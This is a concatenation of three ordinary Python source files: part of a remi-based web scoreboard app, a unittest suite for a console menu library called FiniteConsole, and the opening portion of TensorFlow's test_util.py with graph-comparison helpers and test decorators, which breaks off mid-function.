## self.txtMatchSet = gui.TextInput(width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'30px', 'line-height':'20px', 'text-align':'left', 'border':'1px solid white', 'background':'black'})
## self.txtMatchSet.set_text('5')
# Start button
btMenu = gui.Button('START', width='40%', height='40px', style={'margin':'50px 20% 20px', 'font-size':'30px', 'line-height':'30px', 'text-align':'center'})
## widMenu.append([self.lblMenu, self.lblMenu2, self.lblName1, self.txtName1, self.lblName2, self.txtName2, self.lblMatchSet, self.txtMatchSet, btMenu])
widMenu.append([self.lblMenu, self.lblMenu2, self.lblName1, self.txtName1, self.lblName2, self.txtName2, btMenu])
# Buttons function call
btMenu.onclick.connect(self.on_button_pressed_menu)
# Main container scoreboard page
wid = gui.Widget(width=480, height=610, style={'margin':'0px auto', 'background':'black'})
# Title
self.lbl = gui.Label('SCOREBOARD', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'10px', 'font-size':'30px', 'line-height':'35px', 'text-align':'center'})
# Containers for games counters
# Horizontal container
wid1 = gui.Widget(width='100%', height=600, layout_orientation=gui.Widget.LAYOUT_HORIZONTAL, style={'background':'black'})
# Container for left side
self.wid2 = gui.Widget(width=230, height=350, margin='5px', style={'background':'green'})
# Container for right side
self.wid3 = gui.Widget(width=230, height=350, margin='5px', style={'background':'green'})
# Left side interface
self.lblLeftName = gui.Label(self.Name1, width='95%', height='60px', style={'margin':'20px 2px 0px', 'font-size':'40px', 'line-height':'60px', 'text-align':'center', 'overflow':'hidden'})
self.lblLeftNum = gui.Label(str(self.LeftNum), width='100%', height='130px', style={'margin':'0px 0px 10px', 'font-size':'140px', 'line-height':'130px', 'text-align':'center'})
self.btLeftPlus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btLeftPlus.attributes['class']='up80'
self.btLeftMinus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btLeftMinus.attributes['class']='dn80'
lblLeftMatch = gui.Label('MATCHES WON:', width=150, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
self.lblLeftMatches = gui.Label(str(self.LeftMatchNum), width=30, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
# Right side interface
self.lblRightName = gui.Label(self.Name2, width='95%', height='60px', style={'margin':'20px 2px 0px', 'font-size':'40px', 'line-height':'60px', 'text-align':'center', 'overflow':'hidden'})
self.lblRightNum = gui.Label(str(self.LeftNum), width='100%', height='130px', style={'margin':'0px 0px 10px', 'font-size':'140px', 'line-height':'130px', 'text-align':'center'})
self.btRightPlus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btRightPlus.attributes['class']='up80'
self.btRightMinus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btRightMinus.attributes['class']='dn80'
lblRightMatch = gui.Label('MATCHES WON:', width=150, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
self.lblRightMatches = gui.Label(str(self.RightMatchNum), width=30, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
# Appends all the widgets to create the interface
self.wid2.append([self.lblLeftName, self.lblLeftNum, self.btLeftPlus, self.btLeftMinus, lblLeftMatch, self.lblLeftMatches])
self.wid3.append([self.lblRightName, self.lblRightNum, self.btRightPlus, self.btRightMinus, lblRightMatch, self.lblRightMatches])
wid1.append(self.wid2)
wid1.append(self.wid3)
# Extra labels and button to manage:
# The number of games to win, to win a match
lblMatch = gui.Label('GAMES FOR MATCH:', width='50%', height='50px', style={'margin':'15px 2px 0px 10px', 'font-size':'25px', 'line-height':'35px', 'text-align':'center'})
self.lblMatches = gui.Label(str(self.MatchNum), width='8%', height='50px', style={'margin':'15px 2px 0px', 'font-size':'25px', 'line-height':'35px', 'text-align':'center'})
btMatchPlus = gui.Button('', width='50px', height='50px', style={'margin':'5px 2px 0px 20px', 'font-size':'30px', 'line-height':'30px', 'text-align':'center'})
btMatchPlus.attributes['class']='up50'
btMatchMinus = gui.Button('', width='50px', height='50px', style={'margin':'5px 2px', 'font-size':'30px', 'line-height':'30px', 'text-align':'center'})
btMatchMinus.attributes['class']='dn50'
wid1.append([lblMatch, btMatchPlus, self.lblMatches, btMatchMinus])
# Reset buttons for Score and Matches won
btReset = gui.Button('RESET SCORE', width='50%', height='35px', style={'margin':'10px 25% 10px', 'font-size':'25px', 'line-height':'30px', 'text-align':'center'})
wid1.append(btReset)
btResetMatch = gui.Button('RESET MATCH', width='50%', height='35px', style={'margin':'10px 25% 10px', 'font-size':'25px', 'line-height':'30px', 'text-align':'center'})
wid1.append(btResetMatch)
btSetting = gui.Button('SETTINGS', width='50%', height='35px', style={'margin':'10px 25% 20px', 'font-size':'25px', 'line-height':'30px', 'text-align':'center'})
wid1.append(btSetting)
# Buttons function call
# 'LT', 'RT', 'PLUS', 'MINUS' are used to identify the button pressed; in this way I created a single function for Left and Right buttons.
self.btLeftPlus.onclick.connect(self.on_button_pressed_plus, 'LT')
self.btLeftMinus.onclick.connect(self.on_button_pressed_minus, 'LT')
self.btRightPlus.onclick.connect(self.on_button_pressed_plus, 'RT')
self.btRightMinus.onclick.connect(self.on_button_pressed_minus, 'RT')
btMatchPlus.onclick.connect(self.on_button_pressed_match, 'PLUS')
btMatchMinus.onclick.connect(self.on_button_pressed_match, 'MINUS')
btReset.onclick.connect(self.on_button_pressed_reset)
btResetMatch.onclick.connect(self.on_button_pressed_reset_match)
btSetting.onclick.connect(self.on_button_setting)
# Append the Titleand the interface to the main container
wid.append(self.lbl)
wid.append(wid1)
self.wid = wid
self.widMenu = widMenu
# Returning the configuration page
return self.widMenu
#Used to change the size of the font based on the number of characters of the name
@staticmethod
def name_length(Name):
if len(Name) <= 6:
return (Name, 40)
elif len(Name) <= 8:
return (Name, 30)
elif len(Name) <= 10:
return (Name, 22)
else:
Name = Name[:14] #always cuts the name at 14 characters
return (Name, 22)
#Used to setup the name typed in setting window in the scoreboard, and activate the main widget
def on_button_pressed_menu(self, emitter):
# left name
Name = self.txtName1.get_text()
Name, FntSize = MyApp.name_length(Name)
FntSize = str(FntSize) + "px"
self.lblLeftName.style['font-size'] = FntSize
self.lblLeftName.set_text(Name)
# right name
Name = self.txtName2.get_text()
Name, FntSize = MyApp.name_length(Name)
FntSize = str(FntSize) + "px"
self.lblRightName.style['font-size'] = FntSize
self.lblRightName.set_text(Name)
## self.lblMatches.set_text(self.txtMatchSet.get_text())
## self.MatchNum = int(self.txtMatchSet.get_text())
self.set_root_widget(self.wid)
#Used to activate the setting widget
def on_button_setting(self, emitter):
self.set_root_widget(self.widMenu)
def check_score(self):
# Here the software update automatically any number you can see in the app
if (self.LeftNum < self.MatchNum) and (self.RightNum < self.MatchNum):
self.lblLeftNum.set_text(str(self.LeftNum))
self.lblRightNum.set_text(str(self.RightNum))
self.lblLeftMatches.set_text(str(self.LeftMatchNum))
self.lblRightMatches.set_text(str(self.RightMatchNum))
self.lblMatches.set_text(str(self.MatchNum))
# Here the software check if a background needs to be green or orange.
if (self.LeftNum < self.MatchNum - 1):
self.wid2.style['background-color'] = 'green'
self.btLeftPlus.attributes['class']='up80'
self.btLeftMinus.attributes['class']='dn80'
if (self.RightNum < self.MatchNum - 1):
self.wid3.style['background-color'] = 'green'
self.btRightPlus.attributes['class']='up80'
self.btRightMinus.attributes['class']='dn80'
if (self.LeftNum == self.MatchNum - 1):
self.wid2.style['background-color'] = 'orange'
self.btLeftPlus.attributes['class']='up80org'
self.btLeftMinus.attributes['class']='dn80org'
if (self.RightNum == self.MatchNum - 1):
self.wid3.style['background-color'] = 'orange'
self.btRightPlus.attributes['class']='up80org'
self.btRightMinus.attributes['class']='dn80org'
# When one of the player win the match a thread is called to temporary convert the background to red and then move it back to green.
# The thread is required to don't stop the automatic update of the graphics in the app.
# The app passes to the thread three parameters: lblLeftNum (used as text field to show the number in the app), the widget where the information are on the interface,
# LeftNum that is the varible to check the games won fro the left player). For right player is the same but instead of left in the varible I used right :-).
# Left side
if (self.LeftNum >= self.MatchNum):
Side = [self.lblLeftNum, self.wid2, self.LeftNum, self.btLeftPlus, self.btLeftMinus]
t = threading.Thread(target=self.ChangeColor, args = (Side))
t.start()
self.LeftMatchNum = self.LeftMatchNum + 1
# Right side
elif (self.RightNum >= self.MatchNum):
Side = [self.lblRightNum, self.wid3, self.RightNum, self.btRightPlus, self.btRightMinus]
t = threading.Thread(target=self.ChangeColor, args = (Side))
t.start()
self.RightMatchNum = self.RightMatchNum + 1
# Each function use the Side parameter to identify who called the function and conseguently what update (maybe there is a different way to manage this).
# Increase the number of the games won
def on_button_pressed_plus(self, emitter, Side):
if not self.In:
if Side == 'LT':
if self.LeftNum < self.MatchNum:
self.LeftNum = self.LeftNum + 1
elif Side == 'RT':
if self.RightNum < self.MatchNum:
self.RightNum = self.RightNum + 1
self.check_score()
# Decrease the number of the games won
def on_button_pressed_minus(self, emitter, Side):
if not self.In:
if Side == 'LT':
if self.LeftNum != 0:
self.LeftNum = self.LeftNum - 1
elif Side == 'RT':
if self.RightNum != 0:
self.RightNum = self.RightNum - 1
self.check_score()
# Increase or decrease the Matches number
def on_button_pressed_match(self, emitter, Side):
if not self.In:
if Side == 'PLUS':
self.MatchNum = self.MatchNum + 1
elif Side == 'MINUS':
# When the user decrease the number of Matches to win, in case this became lower than the actual games won by each player, automatically the number of games
# won decrease too. It's a way to never have a number of games won bigger than the number of matches needed to win.
# Try this in the app to better understand my explanation. With Match set-up to five, increase the game won of one player to three and then go down
# with the Matches button to 1 and see what happen.
if self.MatchNum > 1:
if self.MatchNum - 1 <= self.LeftNum:
self.LeftNum = self.LeftNum - 1
if self.MatchNum - 1 <= self.RightNum:
self.RightNum = self.RightNum - 1
self.MatchNum = self.MatchNum - 1
self.check_score()
def on_button_pressed_reset(self, emitter):
if not self.In:
self.LeftNum = 0
self.RightNum = 0
self.check_score()
def on_button_pressed_reset_match(self, emitter):
if not self.In:
self.LeftMatchNum = 0
self.RightMatchNum = 0
self.check_score()
if __name__ == "__main__":
# starts the webserver
# optional parameters
start(MyApp,address='', port=8081, multiple_instance=False,enable_file_cache=True, update_interval=0.1, start_browser=True)
# start(MyApp, debug=True)
|
tests.py
|
import unittest
import threading
from src.FiniteConsole.FiniteConsole import Program, Menu, Option
from src.FiniteConsole import ProgramExistsException, MenuExistsException, UndeterminedOption
class TestProgram(unittest.TestCase):
def setUp(self) -> None:
self.p = Program()
Menu.TEST = True
def tearDown(self) -> None:
self.p.drop()
def test_singleton(self):
self.assertEqual(Program.get_program(), self.p)
try:
self.assertRaises(ProgramExistsException, Program())
except ProgramExistsException:
pass
self.assertEqual(Program.get_program(), self.p)
def test_dependencies_resolver(self):
p = self.p
def func():
pass
empty_menu = Menu('empty')
self.assertIn('no options', p.resolve_dependencies())
empty_menu.action = func
self.assertNotIn('no options', p.resolve_dependencies())
self.assertIn('The initial', p.resolve_dependencies())
p.init_menu = empty_menu
self.assertNotIn('The initial', p.resolve_dependencies())
Menu('main').append_options(Option(1, 'a'))
Menu('a', func)
self.assertFalse(p.resolve_dependencies())
def test_loop(self):
p = self.p
self.assertFalse(p._is_running)
t = threading.Thread(target=p.start_loop())
t.start()
t.join()
self.assertFalse(p._is_running)
p.init_menu = Menu('main')
p.init_menu.append_options(Option(1, 'A', 'Go to A'), Option(2, 'B', 'Go to B'))
Menu('A', lambda x: x*x)
Menu('B', lambda x: x*x)
def for_lambda():
yield 5
p.args.append(next(for_lambda()))
t = threading.Thread(target=p.start_loop)
t.start()
while not p._is_running:
pass
p.stop_loop()
def test_mapping(self):
p = self.p
p.init_menu = Menu('main').append_options(Option(1, 'inner', 'Go to inner'))
Menu('inner').append_options(Option(1, 'main', 'Go back'))
self.assertFalse(p.resolve_dependencies())
self.assertEqual(p._current_menu, p.menus['main'])
p._do_mapping(1)
self.assertEqual(p._current_menu, p.menus['inner'])
p._do_mapping(1)
self.assertEqual(p._current_menu, p.menus['main'])
class TestMenu(unittest.TestCase):
def setUp(self) -> None:
self.p = Program()
def tearDown(self) -> None:
self.p.drop()
def test_registration(self):
p = self.p
self.assertFalse(p.menus)
menus = [Menu('main'), Menu('exit')]
self.assertEqual(len(menus), len(p.menus))
try:
self.assertRaises(MenuExistsException, Menu('main'))
except MenuExistsException:
pass
self.assertEqual(len(menus), len(p.menus))
for menu in menus:
id_ = menu.id
self.assertIn(id_, p.menus)
self.assertIn(menu, p.menus.values())
self.assertEqual(menu, p.menus.get(id_))
for menu, length in zip(menus, range(len(menus), -1)):
menu.remove()
self.assertEqual(length, p.menus)
def test_finite_state(self):
main = Menu('main')
self.assertFalse(main.is_finite)
self.assertIsNone(main.action)
alg1 = Menu('counter', lambda x: x*x)
self.assertTrue(alg1.is_finite)
self.assertTrue(callable(alg1.action))
def test_options_management(self):
menu = Menu('main')
self.assertFalse(menu.options)
opt = Option(1, 'unpinned')
menu.append_options(opt)
self.assertEqual(1, len(menu.options))
self.assertEqual(opt, menu.options.get('1'))
menu.options.clear()
options = [Option(1, 'one'), Option(2, 'two'), Option(3, 'three')]
menu.append_options(*options)
for opt in options:
inp = opt.inp
self.assertEqual(opt, menu.options.get(inp))
self.assertEqual(len(options), len(menu.options))
for opt in options:
menu.remove_options(opt)
self.assertTrue(menu.options.get(opt.inp, True))
self.assertEqual(0, len(menu.options))
menu.append_options(*options)
for opt in options:
menu.remove_options(opt.inp)
self.assertTrue(menu.options.get(opt.inp, True))
self.assertEqual(0, len(menu.options))
def test_remove(self):
p = self.p
menus = [Menu('1'), Menu('2'), Menu('3'), Menu(4)]
for menu in menus:
self.assertIn(menu, p.menus.values())
menu.remove()
self.assertNotIn(menu, p.menus.values())
def test_undetermined_options(self):
menu = Menu(1).append_options(Option(1, 'repeated'))
options = [Option(1, 'a'), Option(1, 'b'), Option(1, 'c')]
for opt in options:
try:
self.assertRaises(UndeterminedOption, menu.append_options(opt))
except UndeterminedOption:
pass
class TestOption(unittest.TestCase):
def setUp(self) -> None:
self.p = Program()
def tearDown(self) -> None:
self.p.drop()
def test_type_binding(self):
main = Menu('main')
exit_ = Menu('exit')
try:
self.assertRaises(AttributeError, Option(None, None))
except AttributeError:
pass
opt = Option(1, 'main')
self.assertEqual(opt.out, main)
opt = Option(1, 'exit')
self.assertEqual(opt.out, exit_)
opt = Option(1, main)
self.assertEqual(opt.out, main)
opt = Option(1, exit_)
self.assertEqual(opt.out, exit_)
if __name__ == '__main__':
unittest.main()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return pywrap_tensorflow.IsBuiltWithROCm()
def GpuSupportsHalfMatMulAndConv():
return pywrap_tensorflow.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, *args, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, *args, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
